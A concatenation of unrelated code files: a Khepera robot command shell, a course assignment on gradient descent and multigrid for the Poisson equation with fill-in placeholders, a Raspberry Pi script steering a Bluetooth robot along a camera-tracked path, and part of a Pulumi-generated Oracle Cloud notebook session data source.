'prereq': [self.PreReqOpen],
'exec': self.CmdMoveToPos
},
# setodometry command
'setodometry': {
'help': {
'desc': "Set Khepera odometry.",
'usage': "setodometry <posLeft> <posRight>",
'args': {
'<posLeft>': "Left motor position in mm [0.0, 343597384.0]",
'<posRight>': "Right motor position in mm [0.0, 343597384.0]"
},
'rvals': "New odometer positions (<posLeft>, <posRight>)."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReArgFloat +
Shell.ReEnd,
'cvt': [self.CvtFloat]
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdSetOdometry
},
# odometry command
'odometry': {
'help': {
'desc': "Get Khepera's odometry.",
'usage': "odometry [incraw]",
'args': {
'incraw': "Include raw odometry data."
},
'rvals': ["Current odometry 2-tuple in mm (<posLeft>, <posRight>).",
"If 'incraw' is specified, then include raw odometry data:",
" (<posLeft>, <posRight>, <rawLeft>, <rawRight>)."]
},
'parse': [
{ 'refmt': Shell.ReStart + ReArgIncRaw + Shell.ReEnd,
'cvt': [self.CvtTrue]
},
{ 'refmt': Shell.ReStart + Shell.ReEnd,
'cvt': []
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdGetOdometry
},
# proximity command
'proximity': {
'help': {
'desc': "Read Khepera proximity IR LED sensors.",
'usage': "proximity [incraw]",
'args': {
'incraw': "Include raw proximity data."
},
'rvals': "Dictionary of read proximity sensors calibrated distances "
"in mm. If 'incraw' is specified, each sensor value is a "
"2-tuple (<mm>, <raw>)."
},
'parse': [
{ 'refmt': Shell.ReStart + ReArgIncRaw + Shell.ReEnd,
'cvt': [self.CvtTrue]
},
{ 'refmt': Shell.ReStart + Shell.ReEnd,
'cvt': []
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdReadProximitySensors
},
# ambient command
'ambient': {
'help': {
'desc': "Read Khepera ambient IR LED sensors.",
'usage': "ambient [incraw]",
'args': {
'incraw': "Include raw ambient data."
},
'rvals': "Dictionary of read ambient sensors calibrated distances "
"in mm. If 'incraw' is specified, each sensor value is a "
"2-tuple (<mm>, <raw>)."
},
'parse': [
{ 'refmt': Shell.ReStart + ReArgIncRaw + Shell.ReEnd,
'cvt': [self.CvtTrue]
},
{ 'refmt': Shell.ReStart + Shell.ReEnd,
'cvt': []
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdReadAmbientSensors
},
# calproximity command
'calproximity': {
'help': {
'desc': "Get proximity sensors' calibration parameters.",
'usage': "calproximity",
'rvals': "Proximity calibration data."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReEnd,
'cvt': []
}
],
'prereq': [],
'exec': self.CmdGetCalProximity
},
# calambient command
'calambient': {
'help': {
'desc': "Get ambient sensors' calibration parameters.",
'usage': "calambient",
'rvals': "Ambient calibration data."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReEnd,
'cvt': []
}
],
'prereq': [],
'exec': self.CmdGetCalAmbient
},
# adc command
'adc': {
'help': {
'desc': "Read the Analog to Digital Converter channel.",
'usage': "adc <channel>",
'args': {
'<channel>': "Channel number [0, 5]."
},
'rvals': "ADC value."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReEnd,
'cvt': [self.CvtInt]
}
],
'prereq': [],
'exec': self.CmdReadAdc
},
# led command
'led': {
'help': {
'desc': "Set Khepera user LED state.",
'usage': "led <led_num> <state>",
'args': {
'<led_num>': "User LED number [0, 1].",
'<state>': "LED state. One of: on off.",
},
'rvals': "New LED state."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReArgOnOff +
Shell.ReEnd,
'cvt': [self.CvtInt, self.CvtOnOff]
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdSetBaseLedState
},
# extbusread command
'extbusread': {
'help': {
'desc': "Read a byte from the Khepera extension bus at the given "
"bus address.",
'usage': "extbusread <addr>",
'args': {
'<addr>': "Bus address [0, 63]."
},
'rvals': "Read byte value."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReEnd,
'cvt': [self.CvtInt]
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdExtBusRead
},
# extbuswrite command
'extbuswrite': {
'help': {
'desc': "Write a byte to the Khepera extension bus at the given "
"bus address.",
'usage': "extbuswrite <addr> <byte>",
'args': {
'<addr>': "Bus address [0, 63].",
'<byte>': "Byte value."
},
'rvals': "Written byte value."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReArgPosInt +
Shell.ReEnd,
'cvt': [self.CvtInt]
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdExtBusWrite
},
# turret command
'turret': {
'help': {
'desc': "Write a a command to a Khepera turret.",
'usage': "turret <tid> <tcmd>",
'args': {
'<tid>': "Turret id [0, 31].",
'<tcmd>': "Turret specific command string."
},
'rvals': "Turret command specific response string."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReArgStr +
Shell.ReEnd,
'cvt': [self.CvtInt, self.CvtStr]
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdTurret
}
}
# now add the additional commands to the dictionary
self.AddToCmdDict(cmds)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Shell Commands
# All commands must return the 2-tuple (rc, rval) where:
# ('err', <errstr>) or ('ok', <data)>)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def CmdGetVersion(self):
""" Get Khepera Version Shell Command. """
ver = self.mRobotCmds.CmdGetVersion()
if ver is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', ver
def CmdGetSpeed(self, incraw=False):
""" Get Khepera Speed Shell Command. """
speed = self.mRobotCmds.CmdGetSpeed(incraw=incraw)
if speed is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', speed
def CmdSetSpeed(self, motorLeft, motorRight):
""" Set Khepera Speed Shell Command. """
speed = self.mRobotCmds.CmdSetSpeed(motorLeft, motorRight)
if speed is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', speed
def CmdStop(self):
""" Stop the Khepera Motion Shell Command. """
return self.CmdSetSpeed(0, 0)
def CmdForward(self, motor):
""" Move the Khepera Forward Shell Command. """
if motor < 0.0:
motor = -motor
return self.CmdSetSpeed(motor, motor)
def CmdBackward(self, motor):
""" Move the Khepera Backward Shell Command. """
if motor < 0.0:
motor = -motor
return self.CmdSetSpeed(-motor, -motor)
def CmdMoveToPos(self, posLeft, posRight):
""" Move Khepera to Position Shell Command. """
pos = self.mRobotCmds.CmdMoveToPos(posLeft, posRight)
if pos is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', pos
def CmdSetOdometry(self, odometerLeft, odometerRight, incraw=False):
""" Set Khepera Odometry Shell Command. """
pos = self.mRobotCmds.CmdSetOdometry(odometerLeft, odometerRight,
incraw=incraw)
if pos is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', pos
def CmdGetOdometry(self, incraw=False):
""" Set Khepera Odometry Shell Command. """
pos = self.mRobotCmds.CmdGetOdometry(incraw=incraw)
if pos is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', pos
def CmdReadAdc(self, channel):
""" Read Khepera ADC Channel Shell Command. """
val = self.mRobotCmds.CmdReadAdc(channel)
if val is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', val
def CmdSetBaseLedState(self, led, state):
""" Set Khepera Base User LED State Shell Command. """
state = self.mRobotCmds.CmdSetBaseLedState(led, state)
if state is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', state
def CmdReadProximitySensors(self, incraw=False):
""" Get Khepera Proximity IR LED Sensors Shell Command. """
sensors = self.mRobotCmds.CmdReadProximitySensors(incraw=incraw)
if sensors is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', sensors
def CmdReadAmbientSensors(self, incraw=False):
""" Get Khepera Ambient IR LED Sensors Shell Command. """
sensors = self.mRobotCmds.CmdReadAmbientSensors(incraw=incraw)
if sensors is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', sensors
def CmdGetCalProximity(self):
""" Get proximity sensors' calibration parameters Shell Command. """
cal = self.mRobotCmds.ProximitySensorsGetCalParams()
return 'ok', cal
def CmdGetCalAmbient(self):
""" Set ambient sensors' calibration parameters Shell Command. """
cal = self.mRobotCmds.AmbientSensorsGetCalParams()
return 'ok', cal
def CmdExtBusRead(self, addr):
""" Read from the Khepera Extension Bus Shell Command. """
byte = self.mRobotCmds.CmdExtBusRead(addr)
if byte is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', byte
def CmdExtBusWrite(self, addr, byte):
""" Write to the Khepera Extension Bus Shell Command. """
byte = self.mRobotCmds.CmdExtBusWrite(addr, byte)
if byte is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', byte
def CmdTurret(self, tid, tcmd):
""" Write a Shell Command to a Khepera Turret Shell Command. """
rsp = self.mRobotCmds.CmdTurret(tid, tcmd)
if rsp is None:
return 'err', self.mRobotCmds.GetErrStr()
else:
return 'ok', rsp
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Parameter Converters
# All converters must return the 2-tuple (rc, rval) where:
# ('err', <errstr>) or ('ok', <data)>)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Common Shell Prerequisites
# All prerequisite checkers must return either True (ok) or False.
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Response Post-Processors
# All response post-processors must print any formatted data to fout.
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Shell Callback Overrides
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#-------------------------------------------------------------------------------
# Main
#-------------------------------------------------------------------------------
#--
if __name__ == "__main__":
import sys
sys.exit( KheRawShell.main(shclass=KheBaseShell,
argv0=__file__,
shName='Khepera Base') )
|
<reponame>liuzhengqi1996/math452_Spring2022<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# # Week 5 Programming Assignment
#
# Remark:
#
# Please upload your solutions of this assignment to Canvas with a file named "Programming_Assignment_5 _yourname.ipynb" before deadline.
# =================================================================================================================
# ## Problem 1 : Use stochastic gradient descent method to train CIFAR10 with ResNet18.
#
# Apply the following two different learning rate schedules respectively
#
# (1) run 120 epochs with a fixed learning rate 0.1,
#
# (2) run 120 epochs, and divide the learning rate by 10 every 30 epochs, which can achieve 94% test accuracy.
#
# and print the results with the following format:
#
# "Epoch: i, Learning rate: lr$_i$, Training accuracy: $a_i$, Test accuracy: $b_i$"
#
# where $i=1,2,3,...$ means the $i$-th epoch, $a_i$ and $b_i$ are the training accuracy and test accuracy computed at the end of $i$-th epoch, and lr$_i$ is the learning rate of $i$-th epoch.
#
# Optional Problem: Try to find some other learning rate schedules to achieve $94$% or higher test accuracy with less epochs.
# In[1]:
# Write your code to solve Problem 1.
# =================================================================================================================
# ## Problem 2 : Consider the possion equation
# \begin{equation}\label{1Dposi}
# \left\{
# \begin{aligned}
# -u''&= f, \,\, 0<x<1, \\
# u(0)&=u(1)=0.
# \end{aligned}
# \right.
# \end{equation}
#
# Assume $f(x)=1$, then the exact solution is $u(x)=\frac{1}{2}x(1-x)$. Given the partition with the grid points
# $x_i=\frac{i}{n+1}, i=0,1,\cdots,n+1$, then by finite element discretization,
# we obtain
#
# \begin{equation}\label{matrix}
# A\ast \mu =b,~~ A=\frac{1}{h}[-1,2,-1].
# \end{equation}
#
# Use gradient descent method to solve the above problem with random initial guess $\mu^0$:
#
# $$
# \mu^{m} = \mu^{m-1} - \eta ( A* \mu^{m-1}- b),~~ m=1,2,3,...,M
# $$
#
# Set $n=15$ and $M=10$.
#
# (1) Plot the curves of $u$ and $\mu^{M}$.
#
# (2) Compute the error of the residual by $e^m = \sqrt{\sum_{i=0}^{n+1}|(A* \mu^{m}- b)_i |^2},~~ m=1,2,3,...,M$ and the index $i$ means the $i$-th entry of the vector. Plot a curve, where x-axis is $m=1,2,3,...,M$ and y-axis is $e^m$.
#
# (3) Find the minumum $M$ when $e^M = \sqrt{\sum_{i=0}^{n+1}|(A* \mu^{M}- b)_i |^2}<10^{-4}$ and record the computational time cost.
# In[2]:
import numpy as np
import time
import matplotlib.pyplot as plt
######## FEM_GD ########
# Write your code in FEM_GD function to compute one gradient descent iteration
def FEM_GD():
######## parameter definition ########
J = 4 # grid level
n = 2**J - 1 # number of inner grid points
h = 1/ 2**J # length of grid interval
x = np.arange(1, n + 1) *h # grid points
u = 1/2*x*(1-x) # true solution at grid points
b = np.ones(n)*h # right-hand-size term
u1 = (np.random.rand(n)*2-1+np.sin(4*np.pi*x))/2 # initial value for u
M = 10
t0 = time.time() # initial time
######## compute numerical solution ########
err = [] # create a list to save the error of each iteration
for m in range(M):
u1 = FEM_GD({Define a FEM_GD function to compute one gradient descent iteration})
temp=np.array([u1[0]*A[1]+u1[1]*A[2]])
for j in np.arange(1,len(u1)-1):
temp=np.append(temp,np.dot(u1[j-1:j+2],A))
Au=np.append(temp,u1[-2]*A[0]+u1[-1]*A[1])
err.append(np.linalg.norm(Au-b)) # compute the error of m-th iteration and save it to the list
print('time cost', time.time() - t0)
######## plot the exact solution and numerical solution ########
plt.figure()
plt.title('Exact solution and numerical solution')
plot = plt.plot(x,u,label='Exact solution')
plot = plt.plot(x,u1,'*',label='Numerical solution')
plt.legend()
plt.show()
######## plot the l2 norm of the error vs iterations ########
plt.figure()
plt.title('Error vs number of iterations using FEM and gradient descent')
plot = plt.plot(err)
plt.xlabel('Number of iterations')
plt.yscale('log')
plt.ylabel('Error')
plt.show()
# =================================================================================================================
# ## Problem 3 : Consider the Poisson equation described in Problem 1, call the Multigrid code given in the following cell to obtain a solution $u^{\nu}$.
# Use multigrid method to solve the above problem with random initial guess $\mu^0$:
#
# $$
# \mu^{m} = MG1(\mu^{m-1}),~~ m=1,2,3,...,M
# $$
#
# Set $n=15$ and $M=10$.
#
# (1) Plot the curves of $u$ and $\mu^{M}$ and record the computational time cost.
#
# (2) Compute the error of the residual by $e^m = \sqrt{\sum_{i=0}^{n+1}|(A* \mu^{m}- b)_i |^2},~~ m=1,2,3,...,M$ and the index $i$ means the $i$-th entry of the vector. Plot a curve, where x-axis is $m=1,2,3,...,M$ and y-axis is $e^m$.
# In[3]:
import numpy as np
import time
import matplotlib.pyplot as plt
######## MG1 definition ########
def MG1(b, u0, J, v): # \mu=[\mu_1,\mu_2,\mu_3,...,\mu_J]
if len(b)!=len(u0):
print('input size not equal')
if len(v)!=J:
print('length of v not equal to J')
B=[0,b]
U=[0,u0]
R=np.array([1/2,1,1/2])
for l in np.arange(1,J+1):
h_l=1/2**(J+1-l)
A=np.array([-1,2,-1]/h_l)
if l<J:
for i in np.arange(0,v[l-1]):
temp=np.array([U[l][0]*A[1]+U[l][1]*A[2]])
for j in np.arange(1,len(U[l])-1):
temp=np.append(temp,np.dot(U[l][j-1:j+2],A))
temp=np.append(temp,U[l][-2]*A[0]+U[l][-1]*A[1])
U[l]+=1/4*h_l*(B[l]-temp)
U.append(np.zeros((len(U[l])-1)//2))
newb=[]
temp=np.array([U[l][0]*A[1]+U[l][1]*A[2]])
for j in np.arange(1,len(U[l])-1):
temp=np.append(temp,np.dot(U[l][j-1:j+2],A))
temp=np.append(temp,U[l][-2]*A[0]+U[l][-1]*A[1])
for k in range((len(U[l])-1)//2):
newb.append(np.dot((B[l]-temp)[2*k:2*k+3],R))
B.append(newb)
else:
for i in np.arange(0,v[l-1]):
temp=np.array(U[l][0]*A[1])
U[l]+=1/4*h_l*(B[l]-temp)
for l in np.arange(J-1,0,-1):
temp=[1/2*U[l+1][0]]
for i in np.arange(1,len(U[l+1])*2):
if i%2==1:
temp.append(U[l+1][(i-1)//2])
else:
temp.append(1/2*(U[l+1][(i-2)//2]+U[l+1][i//2]))
temp.append(1/2*U[l+1][-1])
U[l]+=temp
return U[1]
######## parameter definition ########
J = 4 # grid level
n = 2**J - 1 # number of inner grid points
h = 1/ 2**J # length of grid interval
x = np.arange(1, n + 1) *h # grid points
u = 1/2*x*(1-x) # true solution at grid points
b = np.ones(n)*h # right-hand-size term
u1 = np.random.rand(n)*2-1 # initial value for u
M = 10
t0 = time.time()
######## compute numerical solution ########
err = [] # create a list to save the error of each iteration
{Write your code here to call MG1 function}
print('time cost', time.time() - t0)
######## plot the exact solution and numerical solution ########
plt.figure()
plt.title('Exact solution and numerical solution')
plot = plt.plot(x,u,label='Exact solution')
plot = plt.plot(x,u1,'*',label='Numerical solution')
plt.legend()
plt.show()
######## plot the l2 norm of the error vs iterations ########
plt.figure()
plt.title('Error vs number of iterations using multigrid')
plot = plt.plot(err)
plt.xlabel('Number of iterations')
plt.yscale('log')
plt.ylabel('Error')
plt.show()
# =================================================================================================================
|
<gh_stars>10-100
import sys
import cv2
import os
import imutils
sys.path.append('/home/pi/GitHub/T-BOTS/Python')
from collections import deque
import numpy as np
import matplotlib.pyplot as plt
from TBotTools import tbt, pid, geometry
from time import time
plt.ion()
import bluetooth as bt
from datetime import datetime
import pygame
from pygame.locals import *
from sys import exit
scalefactor = 1
#origin = [636/2,357/2]
origin = [0,0]
showline = 0
########################################################################
#----------------------- Draw ----------------------------#
########################################################################
filename = 'pathpoints.dat'
if os.path.isfile(filename):
aa = np.loadtxt(filename)
aa[:,0] = aa[:,0]*scalefactor+origin[0]
aa[:,1] = aa[:,1]*scalefactor+origin[1]
coordinate = list(tuple(map(tuple,aa.astype(int))))
else:
coordinate = []
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_AUTOFOCUS, 1)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 720)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 405)
success, frame = cap.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cap.release()
pygame.init()
screen = pygame.display.set_mode((633, 359), 0, 0)
canvas = pygame.image.frombuffer(frame.tostring(),frame.shape[1::-1],'RGB')
x = []
y = []
x2 = []
y2 = []
starttime = []
endtime = []
laptime = 1000
oldlaptime = 500
folder = 'RecordedImages/'
record = 0
font = cv2.FONT_HERSHEY_SIMPLEX
#---------------- Setup text writing -----------------#
# org
org = (50, 50)
# fontScale
fontScale = 0.5
# Blue color in BGR
color = (255, 0, 0)
color2 = (255, 255, 255)
# Line thickness of 2 px
thickness = 1
textstr = ''
tii = 0 # counter to prevent recording every frame and slowing the Pi
iii = 1
loopcount = 0
pathindex = 0
timeflag = 0
pathindex = 0
rotspeed = 200
speedfactor = 0.3
turnspeedfactor = 0.3
turntime = 0.005
bendscalefactor = 10
rdeadban = 2
tolerance = 30
feedforward = 0
pos_pid = pid.pid(0.2,0.4,0,[-10,10],[0,40],turntime)
angle_pid = pid.pid(0.4,2.40,0.01,[-15,15],[-60,60],turntime)
#----------------------------------------------------------------------#
# Set HSV Thresholds
#
# Artificial Lighting
#----------------------------------------------------------------------#
greenLower = (36,42,228)
greenUpper = (74,255,255)
pinkLower = (143,70,113)
pinkUpper = (255,255,255)
#----------------------------------------------------------------------#
# Sunny
#----------------------------------------------------------------------#
#greenLower = (74,105,61)
#greenUpper = (90,255,224)
#pinkLower = (127,53,58)
#pinkUpper = (255,255,255)
#----------------------------------------------------------------------#
#----------------------------------------------------------------------#
# Dull
#----------------------------------------------------------------------#
#greenLower = (41,43,213)
#greenUpper = (66,255,224)
#pinkLower = (140,77,98)
#pinkUpper = (255,255,255)
#----------------------------------------------------------------------#
# sets the length of the trail
pts = deque(maxlen=10)
pts2 = deque(maxlen=10)
pathindex = 0
rotspeed = 200
speedfactor = 0.3
turnspeedfactor = 0.3
turntime = 0.005
bendscalefactor = 10
rdeadban = 2
tolerance = 30
#-------------------- Define functions ------------------------------#
geom = geometry.geometry(1) # scale factor to convert pixels to mm
#--------------------- Setup Bluetooth --------------------------------#
data = [0,0,0,0]
sendcount = 0
#------------------------------------------------------------------
# For Linux / Raspberry Pi
#------------------------------------------------------------------
bd_addr = '98:D3:51:FD:81:AC' # use: 'hcitool scan' to scan for your T-Bot address
#bd_addr = '98:D3:51:FD:82:95' # George
#bd_addr = '98:D3:91:FD:46:C9' # B
#bd_addr = '98:D3:32:21:3D:77'
port = 1
btcom = tbt.bt_connect(bd_addr,port,'PyBluez') # PyBluez works well for the Raspberry Pi
#btcom = tbt.bt_connect(bd_addr,port,'Socket')
#----------------------------------------------------------------------#
# For Windows and Mac
#----------------------------------------------------------------------#
#port = 'COM5'
#port = '/dev/tty.George-DevB'
#baudrate = 38400
#bd_addr = 'Empty'
#btcom = tbt.bt_connect(bd_addr,port,'PySerial',baudrate)
#----------------- Generate target function -------------------------#
amplitude = 80
frequency = 1
phase = 0
stepsize = 5
border = 80 # sets the number of pixels from the edge which wont be occupied by the function.
bg = frame.shape[0]/2 # this is the background of the sin function
#---------- Create mask for coordinates ------------#
xdata = np.arange(border, frame.shape[1]-border, stepsize)
aa = np.loadtxt('pathpoints.dat') # Use Click2Path.py to create an arbitrary path
########################################################################
#----------------------- Start main loop ----------------------------#
########################################################################
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_AUTOFOCUS, 0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 720)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 405)
oldtime = time()
if __name__ == '__main__':
success, frame = cap.read()
if not success:
print('Failed to capture video')
sys.exit(1)
#####################################################
#----------------- Track T-Bot -------------------#
#####################################################
while cap.isOpened():
success, frame = cap.read()
#frame = cv2.flip(frame,1)
if not success:
break
if ~btcom.connected():
tries = 0
while btcom.connected() < 1 and tries < 10:
print('Connecting ...')
try:
print('Try '+str(tries+1)+' of 10')
btcom.connect(0)
btcom.connect(1)
tries+=1
except:
print('Something went wrong')
if btcom.connected() < 1:
print('Exiting Program')
sys.exit()
else:
tries = 0
data = btcom.get_data(data)
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV) # do this outside function so it is not done twice
try:
x, y, center, radius, M, cents = geom.tracker(hsv, greenLower, greenUpper)
if radius > 1:
cv2.circle(frame, (int(x), int(y)), int(radius),(0, 255, 0), 2)
cv2.circle(frame, center, 2, (0, 255, 0), -1)
pts.appendleft(center)
except:
pass
try:
x2, y2, center2, radius2, M2, cents2 = geom.tracker(hsv, pinkLower, pinkUpper)
if radius2 > 1:
cv2.circle(frame, (int(x2), int(y2)), int(radius2),(113,212,198), 2)
cv2.circle(frame, center2, 2, (113,212,198), -1)
pts2.appendleft(center2)
except:
pass
#------------- Plot trail overlay -------------#
for i in range(1, len(pts)):
# if either of the tracked points are None, ignore
if pts[i - 1] is None or pts[i] is None:
continue
cv2.line(frame, pts[i - 1], pts[i], (0, 255, 0), 1)
for ii in range(1, len(pts2)):
# if either of the tracked points are None, ignore
if pts2[ii - 1] is None or pts2[ii] is None:
continue
cv2.line(frame, pts2[ii - 1], pts2[ii], (113,212,198), 1)
if showline:
cv2.polylines(frame, np.int32([aa]),True, (255,0,255),2)
cv2.circle(frame, tuple(aa[pathindex,:].astype(int)), 8, (250,150,10), -1)
if laptime < oldlaptime:
if laptime < 1000:
textstr = 'Best time is: '+"{:6.4f}".format(laptime)
oldlaptime = laptime
cv2.putText(frame, textstr, org, font,fontScale, color, thickness, cv2.LINE_AA)
textstr2 = 'Last lap time: '+"{:6.4f}".format(laptime)
cv2.putText(frame, textstr2, (org[0],org[1]+20), font,fontScale, color2, thickness, cv2.LINE_AA)
cv2.imshow('MultiTracker', frame)
###################################################
#--------------- Control Strategy ---------------#
###################################################
if x != [] and x2 !=[]:
vto = aa[pathindex] # target coordinate
try:
vto_next = aa[pathindex+3] # next target coordinate
except:
pass
_distance = geom.distance((x,y),(x2,y2),vto) # distance to target coordinate
if _distance < tolerance:
pathindex += 1 # if close enough to target coordinate, get next coordinate
vto = aa[pathindex]
if timeflag == 0:
starttime = time()
timeflag = 1
pos_pid.clear()
angle_pid.clear()
if pathindex == len(aa)-1:
sendcount = btcom.send_data('200200Z',sendcount)
print('Done, reached end of path...')
#aa = np.flipud(aa)
laptime = time()-starttime
#feedforward += 1
#print(feedforward)
pathindex = 0
timeflag = 0
angle = geom.turn((x,y),(x2,y2),vto)
#dt = time()-oldtime
#rotspeed = 200+angle_pid.output(0,-angle,dt)
rotspeed = 200+angle_pid.output(0,-angle)
oldtime = time()
#straightspeedfactor = 1-np.sin(abs(angle))
straightspeedfactor = 1
#forwardspeed = 200+straightspeedfactor*(pos_pid.output(0,-_distance,dt)+feedforward)
forwardspeed = 200+straightspeedfactor*(pos_pid.output(0,-_distance)+feedforward)
#------------ build data string ------------#
rotspeed = '%03d' % rotspeed
forwardspeed = '%03d' % forwardspeed
print('forward speed '+forwardspeed+' turn speed '+rotspeed)
#-------------- Send data ---------------#
sendstr = str(rotspeed)+str(forwardspeed)+'Z'
sendcount = btcom.send_data(sendstr,sendcount)
key = cv2.waitKey(1) & 0xFF
if key == ord("t"):
buttonstring = '200200F' # Auto trim
sendcount = btcom.send_data(buttonstring,sendcount)
if key == ord("r"):
buttonstring = '200200E' # Auto trim
sendcount = btcom.send_data(buttonstring,sendcount)
if key == ord("y"):
buttonstring = '200200T' # Auto trim
sendcount = btcom.send_data(buttonstring,sendcount)
if key == ord("f"):
feedforward -= 1
print('feedforward = '+str(feedforward))
if key == ord("g"):
feedforward += 1
print('feedforward = '+str(feedforward))
if key == ord("y"):
turnspeedfactor -= 0.01
print('turnspeedfactor = '+str(turnspeedfactor))
# if the 'q' key is pressed, stop the loop
if key == ord("t"):
sendcount = btcom.send_data('200200T',sendcount)
if key == ord("q"):
cap.release()
sendcount = btcom.send_data('200200Z',sendcount)
btcom.connect(0)
break
if record:
if tii == 5:
cv2.imwrite(template % iii, frame)
iii += 1
tii = 0
else:
tii += 1
cv2.destroyAllWindows()
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetNotebookSessionResult',
'AwaitableGetNotebookSessionResult',
'get_notebook_session',
]
@pulumi.output_type
class GetNotebookSessionResult:
"""
A collection of values returned by getNotebookSession.
"""
def __init__(__self__, compartment_id=None, created_by=None, defined_tags=None, display_name=None, freeform_tags=None, id=None, lifecycle_details=None, notebook_session_configuration_details=None, notebook_session_id=None, notebook_session_url=None, project_id=None, state=None, time_created=None):
if compartment_id and not isinstance(compartment_id, str):
raise TypeError("Expected argument 'compartment_id' to be a str")
pulumi.set(__self__, "compartment_id", compartment_id)
if created_by and not isinstance(created_by, str):
raise TypeError("Expected argument 'created_by' to be a str")
pulumi.set(__self__, "created_by", created_by)
if defined_tags and not isinstance(defined_tags, dict):
raise TypeError("Expected argument 'defined_tags' to be a dict")
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name and not isinstance(display_name, str):
raise TypeError("Expected argument 'display_name' to be a str")
pulumi.set(__self__, "display_name", display_name)
if freeform_tags and not isinstance(freeform_tags, dict):
raise TypeError("Expected argument 'freeform_tags' to be a dict")
pulumi.set(__self__, "freeform_tags", freeform_tags)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if lifecycle_details and not isinstance(lifecycle_details, str):
raise TypeError("Expected argument 'lifecycle_details' to be a str")
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if notebook_session_configuration_details and not isinstance(notebook_session_configuration_details, dict):
raise TypeError("Expected argument 'notebook_session_configuration_details' to be a dict")
pulumi.set(__self__, "notebook_session_configuration_details", notebook_session_configuration_details)
if notebook_session_id and not isinstance(notebook_session_id, str):
raise TypeError("Expected argument 'notebook_session_id' to be a str")
pulumi.set(__self__, "notebook_session_id", notebook_session_id)
if notebook_session_url and not isinstance(notebook_session_url, str):
raise TypeError("Expected argument 'notebook_session_url' to be a str")
pulumi.set(__self__, "notebook_session_url", notebook_session_url)
if project_id and not isinstance(project_id, str):
raise TypeError("Expected argument 'project_id' to be a str")
pulumi.set(__self__, "project_id", project_id)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
if time_created and not isinstance(time_created, str):
raise TypeError("Expected argument 'time_created' to be a str")
pulumi.set(__self__, "time_created", time_created)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> str:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the notebook session's compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> str:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the user who created the notebook session.
"""
return pulumi.get(self, "created_by")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Mapping[str, Any]:
"""
Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> str:
"""
A user-friendly display name for the resource. It does not have to be unique and can be modified. Avoid entering confidential information. Example: `My NotebookSession`
"""
return pulumi.get(self, "display_name")
@property
